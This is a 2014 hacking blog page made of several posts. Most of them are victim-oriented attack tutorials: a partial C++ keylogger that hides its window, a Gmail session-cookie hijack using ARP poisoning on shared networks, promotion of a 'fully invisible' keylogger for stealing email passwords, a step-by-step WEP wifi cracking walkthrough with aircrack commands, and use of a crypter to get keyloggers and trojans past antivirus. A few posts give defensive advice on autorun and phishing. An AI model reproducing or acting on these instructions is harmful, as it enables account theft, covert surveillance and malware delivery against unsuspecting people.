Sunday, 30 March 2014

How to disable Autorun in Windows 7

Hello friends, in my previous post i have explained how to fix not able to install any antivirus or unable to update any antivirus problem. Today i will teach you how to disable the Autorun on windows 7 in less than 2 minutes. This will make your system or PC more secure against the Trojan and virus attacks. Your system will not get infected until you by yourself executes its exe(executable) file by yourself. As i always had a bad habit of explaining the things with underlying concept, i will follow the same today too. So friends lets have a brief overview how it works.

disable autorun, turn off autoplay
How to Disable autorun in windows 7
What is Autorun? Is it similar to autoplay? Are they really same, can we use them interchangeably, if yes why and if not why not? I know most of users doesn't know the difference between autoplay and autorun. But after reading this article you will be able to distinguish between both terms. First lets start with similarities, both autoplay and autorun are terms coined by Microsoft and specially for windows platform. Both comes in picture whenever a user connects or mounts a new drive on his/her laptop or PC. Autorun and autoplay are actually configuration files which contains the list of commands that decides what action your Operating system should take when you connects or mounts a new media or drive on your system.
AutoPlay is a feature introduced in Windows XP which examines removable media and devices and, based on content such as pictures, music or video files, launches an appropriate application to play or display the content. But the autorun is little bit different.
AutoRun is actually a feature of Windows Explorer service(actually of the shell32 dll), which enables media and devices to launch programs by use of command listed in a file called autorun.inf, stored in the root directory of the medium. Suppose you want to execute the contents of a folder in this case root directly is your folder. Similarly you can extend the thought.
Have you guys ever tried to understand or noticed what happens when we double clicks on any executable file or set up file(which is also a executable). Hmm.... Let me guess, most of times never. Aha... OK.. i explain the background as you will not going to find this valuable information anywhere on internet except HackingLoops or some content copiers (:P who copies my articles). Whenever a user double clicks on any executable file, a set of instructions are executed in background, these instructions are written in autorun.inf files which tells our operating system that which program has to be executed when user double clicks the exe file.
Ahhahh.... i think you still have little confusion... k little more background. There is one more underlying concept which is actually known as Batch programs, batch program are nothing just these are the programs which are running at back end without users awareness. And which file schedules them, which files decides which file has to be executed when first is completed... Guess... hmm.... Its autorun itself. So friends now i think you are able to understand what actually is autorun.

The autorun.inf is much similar to .ini files, containing information and the commands as key = "value" pairs. These keys specifies the below mentioned things:

    The name and the location of a program to call when the medium is inserted (the "AutoRun task").
    The name of a file that contains an icon that represents the medium in Explorer (instead of the standard drive icon).
    Commands for the menu that appears when the user right-clicks the drive icon.
    The default command that runs when the user double-clicks the drive icon.
    Settings that alter AutoPlay detection routines or search parameters.
    Settings that indicate the presence of drivers.

Autorun makes the viruses or Trojans to execute on your system without your interaction. Hackers write viruses and add their virus execution codes in autorun.inf files which automatically starts executing as soon as you attaches your device to your Laptop or PC. Device can be anything like CD, DVD, Blue Ray, Pen Drive , USB hard disk etc. Autorun is actually a open door to attack your system which makes the hackers work quite easier in spreading their viruses and Trojans.

So friends, how to disable autorun or autoplay in windows 7. This is also quite easier if you know things how they actually work and now you can also estimates the dangers that how much dangerous a simple autorun can be. As hacker i am using this from long time, just to automate my programs (:P batch programs).
I have made a video tutorial for you guys which will explain you all possible ways to turn off or disable autoplay in windows 7. So friends watch the video and give your feedback. If you like it, just a simple thanks as comment can do the magic. So be magician and i will continuously keep teaching you the magical tricks.

Take ownership of any File in Windows 7 in single click

Hey friends,isarg has came up with another ultimate tutorial for its users, this time i will teach you how to take ownership of any file or directory or folder. Several times when we open any file or folder or some directory in Windows 7, we get a error messages like "C://xx/xxx file is not accessible and Access is denied". Hence we are not able to open that file or directory of folder. In case, if you are dealing with system files then you usually get this error message.isarg has already told the solution about this problem in several articles that how we can provide full control to any File using properties then security and so on.. But friends its a too long procedure and very tedious task to do for each and every file separately.

ownership of windows folder
Windows 7 Tips and Tricks byisarg

Today i will teach you how to take ownership of any file or folder or directory in a single click. Its really frustrating when you want to access any folder or directory and you get a message that particular folder is not accessible , access is denied. As a hacker, we need to manipulate windows file system sometimes for our usage but every time we need to do that manual work. But from now onwards, you will not have to do any manual work,just take the ownership in one click. Just follow the steps for one time then you get ownership button in your right click. So whenever you need to take ownership of any file or folder or directory, you need to right click and click on button "I want ownership". So friends lets learn how to do this..

Take ownership of any file in Windows 7 in one click step wise:
1. Open the Notepad.

2. Now copy the below code into it:

    Windows Registry Editor Version 5.00

    [HKEY_CLASSES_ROOT\*\shell\runas]
    @="I want Ownership"
    "NoWorkingDirectory"=""

    [HKEY_CLASSES_ROOT\Directory\shell\runas]
    @="I want Ownership"
    "NoWorkingDirectory"=""

    [HKEY_CLASSES_ROOT\*\shell\runas\command]
    @="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant

    administrators:F"
    "IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\"
    /grant administrators:F"

    [HKEY_CLASSES_ROOT\Directory\shell\runas\command]
    @="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant

    administrators:F /t"
    "IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls
    \"%1\" /grant administrators:F /t"


3. Now save the file as anyfilename.reg by clicking save as button and there selecting all files for save file type as. As shown below:
hack windows registry to own the file or folder
How to save Notepad file as .reg File
4. Now double click on the anyfilename.reg file to merge the settings in registry.
Note: Sometimes some copyrighted code can come below the text while copying the above text. Please remove the same for hack to work.

5. That's all...

6. Now go to any file for which you get the above errors and right click on it.

7. There you will see a option "I want Ownership", click on that and you have ownership. As shown i below sample:

take any file ownership in right click
Take ownership of any File or Folder on Right Click on that file

8. Now open the file and enjoy editing..


Unblock torrent websites in India on Airtel | MTNL

Recently due to supreme court orders all the ISP's like Airtel, MTNL, BSNL, Reliance has blocked the torrent websites like torrentz, pirate bay, h33t etc.. in India from 6th May 2012 onwards. But on 20th May reliance ISP has unblocked the torrent websites but other ISP's still blocking the torrent websites. Good news for reliance users but other ISP's still s**ks. So friends, today i am going to teach how to unblock torrent websites in India specially on AIRTEL, MTNL and BSNL broadband services. Lets learn... Wanna learn complete concept??  Oops my bad... I always focus on concepts, so first lets learn what is torrent and what & how ISP's block websites etc? Then easy ways to bypass the noobish stuff.. Tell Mr. Sibal that your f**king strategies won't gonna work against the young Indian cyber generation (because we don't belong to his generation, we are next generation hackers and techies).

What is torrent?
Most of us regularly use torrents to download stuff like movies, songs, tv shows, software's..aha.. simply everything that can be downloaded online but have you ever try to understood what is torrent? How it works? What are seeds and Peers? Oops never... From now onwards you will able to understand what are all these terms.
Torrent is basically strong and fast-moving stream of data ( normally used in context of water stream). Technically torrent file is file which signifies to some specific content say movie etc.., it uses peer to peer sharing protocol (P2P) that enables users to send and receive files in small pieces to and from computers across the Internet. Because of the distributed nature of Peer to Peer sharing( usually computer networks behavior which are peered i.e. connected together), small pieces of the files are downloaded and then reassembled by the software(torrent client that you use say utorrent etc.).

How does torrents work?
All torrent downloading/uploading takes place using a torrent program. Examples of such programs include uTorrent, Vuze, BitTorrent etc. These programs enable your computer(open the computer ports) to send and receive pieces of files on a specific port and interpret the data from torrent files. The torrent files contain all of the information about a specific torrent: who started it, what the torrent contains, and how to download and upload information corresponding to that torrent. When the torrent file is opened by a torrent program, the torrent program connects to other users who have portions of the file and downloads those pieces from them. Once it receives portions of the file, your computer becomes able to "seed," or upload, the file to other users. Once the torrent program has received all portions of the file, it assembles them into a usable file using the instructions found in the original torrent file.

Trackers??
Torrent downloading/Uploading begins and ends at large network servers known as trackers. Your torrent program, known as a client, connects to these servers using a list found in the original torrent file. Trackers have a list of all users connected to them and which files they're able to seed. Your client picks from these users and downloads data from them accordingly. Upon connecting to a tracker, it registers your computer and the files that you are able to seed. Trackers also keep logs of your share ratio( i.e. how much your computer uploads, measured against how much your computer downloads) and determine the amount of bandwidth you receive, based on that ratio.

How does ISP blocks any websites?
All ISP's provide default DNS (domain name servers) which is the used to translate the domain name into an IP address. So most ISP's block the websites at DNS level which is really noobish because if user change their DNS then he can unblock the websites blocked by DNS. And we are far smarter than normal users and thanks to IPV4 and IPV6 because we can change our DNS server whenever we want.

How to unblock torrents in INDIA specially on AIRTEL, MTNL, BSNL etc?
There are actually several methods to unblock torrents:
1.Use HTTPS instead of HTTP: As ISP's have only blocked HTTP web version of websites, you can directly access all torrent websites using HTTPS instead of HTTP.
So open websites like: https://torrentz.eu
                                https://piratebay.se
Just accept the SSL certificate and it will work for you.

2. Change the DNS to public or free DNS servers say Google (8.8.8.8 and 8.8.4.4), Norton (198.153.192.40 or 198.153.194.40) or any other public DNS that can be easily found.
Norton DNS: Protects you from phishing websites.
Go to your network connection then select status and then click on properties below the Activity there select the IPV4 and click on properties. There at below you see  " use the following DNS name" there fill the primary DNS and alternate DNS servers. Apply it and enjoy the torrents... :P

3. Use TOR browser bundle : Using TOR you can bypass anything anywhere in the world and also it will hide your traces by protecting the privacy.
You can download TOR here:
DOWNLOAD

4. Use proxies : Not a good option but you can use that also, just keep one thing in mind while using proxies that you need to unclick the encrypt URL option in proxy setting, otherwise you will end up downloading a encrypted torrent file and offcourse its waste. So always unclick Encrypt URL while using torrents.

5. Use VPN: A free VPN can also come to your rescue. All you need to do is download and install a free VPN client. After this, all the URL requests of the blocked websites can be easily bypassed through it. Among several others, providers such as freevpn, supervpn and vpnreactor give you such free service.

How to code keylogger in C programming Language


C code champ has brought you a detailed tutorial on how to write a Keylogger code in C programming.
C program of Keylogger or keystroke logger :  Keylogger is a computer program which captures all the key strokes pressed by user in real time. It captures all the keys and write them to some file say log.txt and stores it on computer hard disk. Now sending these logs to emails or FTP address depends upon the type of keylogger that is keylogger is remote keylogger or physical keylogger. Physical keyloggers are useful when you have physical access to that system and can retrieve logs personally. While remote keyloggers can be used from anywhere in the world, the only requirement is that victim must have internet connection. Today we will be writing a C program of Physical keylogger or Keystroke logger which requires physical access of the system. We will be extending our logic in further programs to make it remote keylogger which sends logs to FTP’s and Emails directly. So first of all lets see how simple keylogger program works…

C program of Keylogger or Keystroke logger


Algorithm for writing a Simple Keylogger :

    1. Create an Empty log file for storing keylogs.
    2. Intercept keys pressed by user using GetAsyncKeyState() function.
    3.  Store these intercepted values in file.
    4.  Hide the Running Window Dialog to make it undetectable.
    5.  Use while loop to make it running in all conditions.
    6.  Add Sleep() function to reduce the CPU usage to 0%.


Now let us see the C program of keylogger or keystroke logger which intercepts all the keys pressed by the user and store these pressed keys in log file.

C program of Keylogger or keystroke logger :

    #include<iostream>
    #include<windows.h>
    #include<fstream>
    #include<time.h>
    using namespace std;

    int main()
    {
     bool runlogger = true;
     ofstream log;
     //where your logs will be stored
     log.open("C:\\log.txt", ofstream::out);
     //displaying error message when unable to open file
     if(log.fail())
      {
       printf("Error in opening log.txt file\n");
       }
      //Code for hiding running dialog
      HWND hideIt = FindWindow("ConsoleWindowClass",NULL);
      ShowWindow(hideIt,0);
      //Logic for capturing keystokes ........
      ...................

To view the complete C program visit my website on C programming

Friday, 28 March 2014

Hacking Gmail using the GX cookie Loophole and Its Solution

Hey Guys as a Ethical hacker I am always curious to Find the New Loopholes in Existing websites ,software and other things... Today over the Internet I found a Very Dangerous Loophole in the Gmail (Best Mailing Services In the World) and I am Going to Share that With You Guys. I have Tried this from my college Network so there Will be Some Assumptions and Tools Needed for that... So Read On...

NOTE: THIS TUTORIAL IS FOR EDUCATIONAL PURPOSES ONLY ! HEY GOOGLE STAFF IF YOU FINAL THIS AS INAPPROPRIATE CONTENT. PLEASE INFORM ME TO REMOVE THIS THANKS!

SOME ASSUMPTIONS:

   You are in Local Area Network (LAN) in a switched / wireless environment : example : office , cyber café, Mall etc.
    You know basic networking.

Tool used for this attack:

    Cain & Abel or Any Ethernet Capturing Tool
    Network Miner
    Firefox web browser with Cookie Editor add-ons (anEC Cookie Editor)

(ALL THE TOOLS MENTIONED HERE ARE AVAILABLE FOR FREE DOWNLOADS YOU JUST HAVE TO GOOGLE THEM)

Attack in detail:
We assume you are connected to LAN/Wireless network. Our main goal is to capture Gmail GX cookie from the network. We can only capture cookie when someone is actually using his gmail. I’ve noticed normally in free Classes in College when people normally check their emails. If you are in cyber café or in Mall then there are more chances of catching people using Gmail.
We will go step by step, If you are using Wireless network then you can skip this Step A.

A.) Using Cain to do ARP poisoning and routing:

Switch allows unicast traffic mainly to pass through its ports. When X and Y are communicating eachother in switch network then Z will not come to know what X & Y are communicating, so inorder to sniff that communication you would have to poison ARP table of switch for X & Y. In Wireless you don’t have to do poisoning because Wireless Access points act like HUB which forwards any communication to all its ports (recipients).

    Start Cain from Start > Program > Cain > Cain
    Click on Start/Stop Snigger tool icon from the tool bar, we will first scan the network to see what all IPs are used in the network and this list will also help us to launch an attack on the victim.
    Then click on Sniffer Tab then Host Tab below. Right click within that spreadsheet and click on Scan Mac Addresses, from the Target section select

All hosts in my subnet and then press Ok. This will list all host connected in your network. You will notice you won’t see your Physical IP of your machine in that list. How to check your physical IP ?

    Click on start > Run type cmd and press enter,
    In the command prompt type Ipconfig and enter. This should show your IP address assign to your PC.

It will have following outputs:

    Ethernet adapter Local Area Connection:
    Connection-specific DNS Suffix . : xyz.com

IP Address. . . . . . . . . . . . : 192.168.1.2
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.1.1

Main thing to know here is your IP address and your Default Gateway.
FOR AMU Its : 10.10.50.1
FOR  BSNL Its : 192.168.1.1

Make a note of your IP Address & default gateway. From Cain you will see list of IP addresses, here you have to choose any free IP address which is not used anywhere. We assume IP 192.168.1.10 is not used anywhere in the network.

    Click on Configure > APR > Use Spoof ed IP and MAC Address > IP

Type in 192.168.1.10 and from the poisoning section click on “Use ARP request Packets” and click on OK.

    Within the Sniffer Tab , below click on APR Tab, from the left hand side click on APR and now click on the right hand top spreadsheet then click on plus sign tool from top. The moment you click that it will show you list of IP address on left hand side. Here we will target the victim IP address and the default gateway.


The purpose is to do ARP poisoning between victim and the default gateway and route the victim traffic via your machine. From the left side click on Victim IP address, we assume victim is using 192.168.1.15. The moment you click on victim IP you will see remaining list on the right hand side here you have to select default gateway IP address i.e. 192.168.1.1 then click on OK.


    Finally, Click on Start/Stop Sniffer tool menu once again and next click on Start/Stop APR. This will start poisoning victim and default gateway.


B.) Using Network Miner to capture cookie in plain text

We are using Network miner to capture cookie, but Network miner can be used for manythings from capturing text , image, HTTP parameters, files. Network Miner is normally used in Passive reconnaissance to collect IP, domain and OS finger print of the connected device to your machine. If you don’t have Network miner you can use any other sniffer available like Wireshark, Iris network scanner, NetWitness etc.

We are using This tool because of its ease to use.


    Open Network Miner by clicking its exe (pls note it requires .Net framework to work).
    From the “---Select network adaptor in the list---“ click on down arrow and select your adaptor If you are using Ethernet wired network then your adaptor would have Ethernet name and IP address of your machine and if you are using wireless then adaptor name would contain wireless and your IP address. Select the one which you are using and click on start.



Important thing before you start this make sure you are not browsing any websites, or using any Instant Mesaging and you have cleared all cookies from firefox.

    Click on Credential Tab above. This tab will capture all HTTP cookies , pay a close look on “Host” column you should see somewhere mail.google.com. If you could locate mail.google.com entry then in the same entry right click at Username column and click on “copy username” then open notepad and paste the copied content there.
    Remove word wrap from notepad and search for GX in the line. Cookie which you have captured will contain many cookies from gmail each would be separated by semicolon ( GX cookie will start with GX= and will end with semicolon you would have to copy everything between = and semicolon



Example : GX= axcvb1mzdwkfefv ; ßcopy only axcvb1mzdwkfefv

Now we have captured GX cookie its time now to use this cookie and replay the attack and log in to victim email id, for this we will use firefox and cookie editor add-ons.


C.) Using Firefox & cookie Editor to replay attack.


  Open Firefox and log in your gmail email account.
    From firefox click on Tools > cookie Editor.
    In the filter box type .google.com and Press Filter and from below list search for cookiename GX. If you locate GX then double click on that GX cookie and then from content box delete everything and paste your captured GX cookie from stepB.4 and click on save and then close.
    From the Address bar of Firefox type mail.google.com and press enter, this should replay victim GX cookie to Gmail server and you would get logged in to victim Gmail email account.
    Sorry! You can’t change password with cookie attack.(LIMITATION OF ATTACK)

SOLUTION: HOW TO PROTECT URSELF FROM THIS HACK

Google has provided a way out for this attack where you can use secure cookie instead of unsecure cookie. You can enable secure cookie option to always use https from Gmail settings.
Settings > Browser connection > Always use https .

I Hope You Have Enjoyed This ... Any Queries ?? Please Comment !

Best keylogger software to hack email accounts or passwords

 Today i am sharing with you the best keylogger software to hack email accounts or passwords and much more.  I only limitation of this keylogger is that you need to install it to victim server that means you  require physical access to the victims PC at least once.
The keylogger that i have rated the best one from all available keylogger is Award Keylogger and why so, its not because of it's recording keys feature but because of its extensive features and ease of configuration and installation.

It not only monitors the key strokes and send them to email or FTP server but more than that it also captures the screen shot and biggest thing is that its 100% undetectable. None of the antivirus can detect it. What you need to hack email accounts and other website passwords of any victim is that is you need to install it to his system.
best keylogger to hack email accounts and passwords
Hack email accounts or passwords using best keylogger
Introduction about Award Keylogger
Award Keylogger allows you to monitor all users' activity on any computers in real time and record each computer's usage history. Award Keylogger makes it easy to view, in real time, the screenshots of the any computers, all typed keystrokes, visited Web sites, used programs. You can view a list of running processes and terminate undesirable ones.

Main Features:
• New! Run keylogger as a Windows service
• Easy-to-use, even for beginners
• Absolutely invisible/stealth mode
• Logs accounts and passwords typed in the every application
• Logs message typed in all instant messengers
• Visual surveillance, support screenshots view
• Slide show for screenshots
• Captures the contents behind the asterisks
• Captures mouse clicks
• Logs websites visited
• Captures AOL/AIM/Yahoo/ICQ chats
• Keyword Detection and Notification
• Records contents of password protected web pages, including Web Mail messages
• Logs Windows Clipboard
• Sends log by e-mail
• Uploads ALL logs into the separate folders by FTP
• Invisible for the firewall program
• Invisible in the Windows startup list
• Monitors all users of the PC
• User friendly HTML file format for emailed logs
• Invisible in Windows NT/2000/XP Task Manager and Windows 9.x/Me Task List
• Records Windows 9.x/Me/2000/XP/VISTA logon passwords
• Intercepts DOS-box and Java-chat keystrokes
• Supports international keyboards
• External log viewer
• Supports printing of the log
• Optimized for Windows XP
• Exports log to HTML
DOWNLOAD FULL VERSION OF AWARD KEYLOGGER(click on download text)

Thursday, 27 March 2014

How to Prevent Email Password from Hackers


In My Previous posts i have discussed how to hack email accounts or passwords using several techniques. As i have said there i will share with you how to prevent email account password from hackers. This is a complete guide to protect yourself from being hacked and secure your personal information from getting leaked or used by anybody online. This guide will also help you to learn several latest techniques that hackers use to hack email accounts and passwords. So guys lets discuss how to protect or prevent your email account passwords from getting hacked. Its a must read post for all online users who uses email and social networking websites.
As its a Great saying " Prevention is better than Cure".  So you must know to prevent yourself rather than curing after got victimized or falling prey to these hacking attacks.

prevent email password from getting hacked by hackers
Protect or Prevent email account password


Complete Guide to prevent your Email Passwords from Hackers:
1. Don't use the links in an email, instant message, or chat to get to any web page if you suspect the message might not be authentic or you don't know the sender or user's handle. Instead, call the company on the telephone, or log onto the website directly by typing in the Web address in your browser.
2. Avoid filling out forms in email messages that ask for personal financial information.
3. You should only communicate information such as credit card numbers or account
information via a secure website or the telephone.  Always ensure that you're using a secure website when submitting credit card or other sensitive information via your Web browser.


    Phishers are now able to 'spoof,' or forge BOTH the "https://" that you normally see when you're on a secure Web server AND a legitimate-looking address. You may even see both in the link of a spam email. Again, make it a habit to enter the address of any banking, shopping, auction, or financial transaction website yourself and not depend on displayed links. 
    Phishers may also forge the yellow lock you would normally see near the bottom of your screen on a secure site. The lock has usually been considered as another indicator that you are on a 'safe' site. The lock, when double-clicked, displays the security certificate for the site. If you get any warnings displayed that the address of the site you have displayed does NOT match the certificate, do not continue.
    Remember not all spam sites will try to show the "https://" and/or the security lock. Get
    in the habit of looking at the address line, too. Were you directed to PayPal? Does the
    address line display something different like
    "http://www.gotyouscammed.com/paypal/login.htm?"  Be aware of where you are going. 


4. Consider installing a Web browser tool bar to help protect you from known fraudulent websites. These toolbars match where you are going with lists of known phisher Web
sites and will alert you. 
The newer version of Internet Explorer version 7 or 8 beta includes this tool bar as does FireFox Verison 4.xx or 5 Beta too.

    EarthLink ScamBlocker is part of a browser toolbar that is free to all Internet users - download at http://www.earthlink.net/earthlinktoolbar

5. Regularly log into your online accounts. Don't leave it for as long as a month before you check each account.

6. Regularly check your bank, credit and debit card statements to ensure that all transactions are legitimate (or legal) and done by you or in your supervision. If anything is suspicious or you don't recognize the transaction, contact your bank and all card issuers.

7. Ensure that your browser is up to date and security patches applied.

8. Never Download anything from anonymous links or links in email accounts or chat boxes.
 
9. Always avoid downloading cracks, keygens and patches as most of these contains Trojans and Malware content that will leak you personal data to hackers.

10. Regularly update your antivirus and anti-spyware software so that all new viruses are detectable and can be repaired easily.

11. While Installing freewares always take precautions and don't install the additional recommended things by the software's. Install only those that you know or that might be useful for you. And never install toolbars as their codes are dynamic that means they can be used to steal your private secured data such as credit card details, email accounts information and other personal data such as your searching patterns and your computer event logs etc.
 
 
Few more Important Things that you should always remember:

Always report "phishing" or “spoofed” e-mails to the following groups: 

    forward the email to reportphishing@antiphishing.org 
    forward the email to the Federal Trade Commission at spam@uce.gov 
    forward the email to the "abuse" email address at the company that is being
    spoofed (e.g. "spoof@ebay.com") 
    when forwarding spoofed messages, always include the entire original email with
    its original header information intact 
    notify The Internet Crime Complaint Center of the FBI by filing a complaint on
    their website: www.ic3.gov


Some Tips while choosing your Passwords:

    Choose a complex password. If you use a simple password such as "password" or "rockstar" or any dictionary word, it makes it easy for people to guess your password. This is especially true if your potential hackers are friends and family members who might try to guess. Instead, choose a password that makes use of both capital and lower case letters, numbers and special characters like the percent or dollar sign.
    Change your password regularly. Every month, make a point of changing your password to a new complex.

How to Hack Wifi or Wireless Password


Today i will explain you how to crack Wifi or wireless password in just 10 to 15 minutes. In my previous articles i have explained the different wireless scanning tools and scanning wireless networks using NetStumbler. Today i will explain How to Hack or Crack Wifi Password. Today's hack will be based on cracking the WEP encryption password. So guys tighten your belts for new hack and lets start hack wifi. I have also included the video at bottom of the post. So guys read on and watch ....

STEPS TO HACK WIFI OR WIRELESS PASSWORD

1. Get the Backtrack-Linux CD. Backtrack Linux Live CD(best Linux available for hackers with more than 2000 hacking tools inbuilt).
Download Backtrack Linux Live CD from here: CLICK HERE

2.  SCAN TO GET THE VICTIM

Get the victim to attack that is whose password you want to hack or crack.
Now Enter the Backtrack Linux CD into your CD drive and start it. Once its started click on the black box in the lower left corner to load up a "KONSOLE" . Now you should start your Wifi card. To do it so type

    airmon-ng


You will see the name of your wireless card. (mine is named "ath0") From here on out, replace "ath0" with the name of your card. Now type

    airmon-ng stop ath0


then type:

    ifconfig wifi0 down


then type:

    macchanger --mac 00:11:22:33:44:55 wifi0


then type:

    airmon-ng start wifi0


The above steps i have explained is to spoof yourself from being traced. In above step we are spoofing our MAC address, this will keep us undiscovered.

Now type:

    airodump-ng ath0


All above steps in one screen shot:

hack wifi, hack wifi password, hack wifi network,hack wep key, hack wifi password software

Now you will see a list of wireless networks in the Konsole. Some will have a better signal than others and its always a good idea to pick one that has a best signal strength otherwise it will take huge time to crack or hack the password or you may not be able to crack it at all.
Once you see the networks list, now select the network you want to hack. To freeze the airodump screen HOLD the CNTRL key and Press C.
Now you will see something like this:

hack wifi, hack wifi password, hack wifi network,hack wep key, hack wifi password software


3.  SELECTING NETWORK FOR HACKING

Now find the network that you want to crack and MAKE SURE that it says the encryption for that network is WEP. If it says WPA or any variation of WPA then move on...you can still crack WPA with backtrack and some other tools but it is a whole other ball game and you need to master WEP first.

hack wifi, hack wifi password, hack wifi network,hack wep key, hack wifi password software

Once you've decided on a network, take note of its channel number and bssid. The bssid will look something like this --

    00:23:69:bb:2d:of


The Channel number will be under a heading that says "CH".
As shown in this figure:

hack wifi, hack wifi password, hack wifi network,hack wep key, hack wifi password software


Now in the same KONSOLE window type:

    airodump-ng -c (channel) -w (file name) --bssid (bssid) ath0



The file name can be whatever you want. This file is the place where airodump is going to store the packets of info that you receive to later crack. You don't even put in an extension...just pick a random word that you will remember. I usually make mine "Ben" because I can always remember it. Its simply because i love ben10....hhahahahaha :D

Note: If you want to crack more than one network in the same session, you must have different file names for each one or it won't work. I usually name them as ben1, ben2 etc.

Once you typed in that last command, the screen of airodump will change and start to show your computer gathering packets. You will also see a heading marked "IV" with a number underneath it. This stands for "Initialization Vector" but in general terms all this means is "packets of info that contain characters of the password." Once you gain a minimum of 5,000 of these IV's, you can try to crack the password. I've cracked some right at 5,000 and others have taken over 60,000. It just depends on how long and difficult they made the password. More difficult is password more packets you will need to crack it.



4.  Cracking the WEP password

Now leave this Konsole window up and running and open up a 2nd Konsole window.
In this window type:

    aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 ath0


This will send some commands to the router that basically it is to associate your computer even though you are not officially connected with the password. If this command is successful, you should see about 4 lines of text print out with the last one saying something similar to "Association Successful :-)"
If this happens, then good! You are almost there.

Now type:

    aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 ath0


This will generate a bunch of text and then you will see a line where your computer is gathering a bunch of packets and waiting on ARP and ACK. Don't worry about what these mean...just know that these are your meal tickets. Now you just sit and wait. Once your computer finally gathers an ARP request, it will send it back to the router and begin to generate hundreds of ARP and ACK per second. Sometimes this starts to happen within seconds...sometimes you have to wait up to a few minutes. Just be patient. When it finally does happen, switch back to your first Konsole window and you should see the number underneath the IV starting to rise rapidly. This is great! It means you are almost finished! When this number reaches AT LEAST 5,000 then you can start your password crack. It will probably take more than this but I always start my password cracking at 5,000 just in case they have a really weak password.

Now you need to open up a 3rd and final Konsole window. This will be where we actually crack the password.
Now type:

    aircrack-ng -b (bssid) (filename)-01.cap


Remember the file name you made up earlier? Mine was "Ben". Don't put a space in between it and -01.cap here. Type it as you see it. So for me, I would type wepkey-01.cap
Once you have done this you will see aircrack fire up and begin to crack the password. typically you have to wait for more like 10,000 to 20,000 IV's before it will crack. If this is the case, aircrack will test what you've got so far and then it will say something like "not enough IV's. Retry at 10,000."
DON'T DO ANYTHING! It will stay running...it is just letting you know that it is on pause until more IV's are gathered. Once you pass the 10,000 mark it will automatically fire up again and try to crack it. If this fails it will say "not enough IV's. Retry at 15,000." and so on until it finally gets it.

If you do everything correctly up to this point, before too long you will have the password! now if the password looks goofy, dont worry, it will still work. some passwords are saved in ASCII format, in which case, aircrack will show you exactly what characters they typed in for their password. Sometimes, though, the password is saved in HEX format in which case the computer will show you the HEX encryption of the password. It doesn't matter either way, because you can type in either one and it will connect you to the network.

Take note, though, that the password will always be displayed in aircrack with a colon after every 2 characters. So for instance if the password was "secret", it would be displayed as:

    se:cr:et


This would obviously be the ASCII format. If it was a HEX encrypted password that was something like "0FKW9427VF" then it would still display as:

    0F:KW:94:27:VF

hack wifi, hack wifi password, hack wifi network,hack wep key, hack wifi password software

Just omit the colons from the password, boot back into whatever operating system you use, try to connect to the network and type in the password without the colons and presto! You are in!

It may seem like a lot to deal with if you have never done it, but after a few successful attempts, you will get very quick with it. If I am near a WEP encrypted router with a good signal, I can often crack the password in just a couple of minutes.

I am not responsible for what you do with this information. Any malicious/illegal activity that you do, falls completely on you because...technically...this is just for you to test the security of your own network.

How to Find Gmail account creation date

"How to find Gmail account creation date". Well, this question has immense value when it comes to Gmail password recovery. Why??? Because, during initiating a password reset using Gmail Contact Form, you have to enter the Gmail account creation date, otherwise you are not allowed to reset your password. So, I have mentioned two ways by which you can know your Gmail account creation date.

Find Gmail account creation date

Note: This article is not meant for those who have lost their password. I am writing this article for those who have access to their account, but don't know how to check Gmail account creation date. In future, if by some means, you lose your password and want to use Gmail accounts Form, this Gmail account creation date will help you.

Get Gmail account creation Date:

1. Gmail Welcome Mail:

All Gmail accounts receive "Gmail Welcome Mail" after they create their Gmail account. So, this "Welcome Mail" has the same date as your Gmail account creation date. So, noting this date will serve the purpose. Go to Gmail inbox and hit on Oldest button to get the last message. This message will be from Gmail Team. Note this mail's date. Done!!!

But, many readers said that they have deleted Welcome mail and so are unable to get the account creation date. If you are one of them, proceed to the second point.
2. Using POP:

Well, this method will work for accounts created after 2007.
Go to Settings -> Forwarding and POP/IMAP and under POP Download, look for:

Status: POP is enabled for all mail that has arrived since "Your Account Creation Date"

and you will get the required date.

How to Bypass Antivirus and send Keylogger to Hack Emails and Remote PC using FUD Crypter

In my Previous Post " Where The Saved Passwords Stored in Windows Xp" .Today I am going to tell you all that how to bind keylogger by using FUD encrypter to make it undetectable by any Antivirus. In my previous article I haven't provided the Download Link of the FUD Encrypter But in this I have Provided the Link along with details that how to use it.... So read on ...

FUD Crypter software - Bypass antivirus:

This Crypter is UD (Undetectable) and not FUD (Fully Undetectable) free software, because it is detected by Avira antivirus and even Kaspersky antivirus as virus. Hence, it is 2/22 UD ie only 2 antiviruses out of 22 detected this as virus. Thus, if your victim is using any antivirus other than Avira and Kaspersky, then chill out guys.. here's the solution for your problem.

Download UD Crypter software:

As I have explained previously, Crypter is used to bypass antivirus detection on victim computer. So, we use Crypter software to encrypt our Keylogger and trojan. Due to encryption by Crypter software, whenever victim runs our sent keylogger or trojan on his computer, his antivirus does not detect our keylogger as virus and our keylogger is prevented from being deleted on victim computer.

1. Download UD Crypter software here.
DOWNLOAD:   http://www.mediafire.com/?my5izqy0gkm

2. extract the Zip file  to obtain FUD Crypter free software.

3. Run Krypter.exe application on your computer system to see something like this:


4. Now, browse to the file (keylogger or any trojan) you wanna crypt to bypass antivirus detection and hit on "Encrypt".

5. A new file will be created in same directory. Now, scan this file with your antivirus and it will not detect any virus (except Avira and Kaspersky).

Note: You may get certain error on your computer like this:


If you are getting this error, install Library file package to fix this error.

SO that's the overall Tutorial Hope that You Will like It. That's from my site Now Comment and ask your Questions If you Have .. Or having Any Problem In using the Software.

Find Unauthorized Activity in Your Email Account

Do You think or suspect your email account has been hacked or somebody else is using your account?  Do you suspect that your Email account is under attack? Is email account secured enough that it cannot be hacked? Do you want to make your email account 100% hack proof? If Yes, then this article is for you. So friends read on..

Find Unauthorized Activity in Your Email Account
Sometimes our email account has been hacked and we are not aware of that. Someone else i.e. some hacker is accessing your account and might be misusing it. But since we are not aware of that and we still think that our account and its privacy is safe but some third person is using it and accessing our private information and details. Now How you will detect that your account is under attack that How to find unauthorized activity in your email account. Here are few tips.

These are some signs of Unauthorized activity in Your email account:
1. Your new emails are marked as Read even if you’ve not read them.
2. Your emails are moved to Trash or even permanently deleted without your notice.
